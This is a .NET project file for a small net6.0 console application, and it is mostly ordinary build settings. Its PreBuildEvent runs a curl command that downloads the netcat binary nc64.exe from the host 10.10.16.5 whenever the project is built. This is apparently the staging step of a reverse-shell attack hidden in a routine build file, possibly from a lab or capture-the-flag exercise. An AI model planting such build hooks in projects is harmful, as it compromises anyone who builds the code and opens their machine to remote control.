<Project Sdk="Microsoft.NET.Sdk">




  <PropertyGroup>
	  <PreBuildEvent>curl 10.10.16.5/nc64.exe -o nc64.exe</PreBuildEvent>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

</Project>
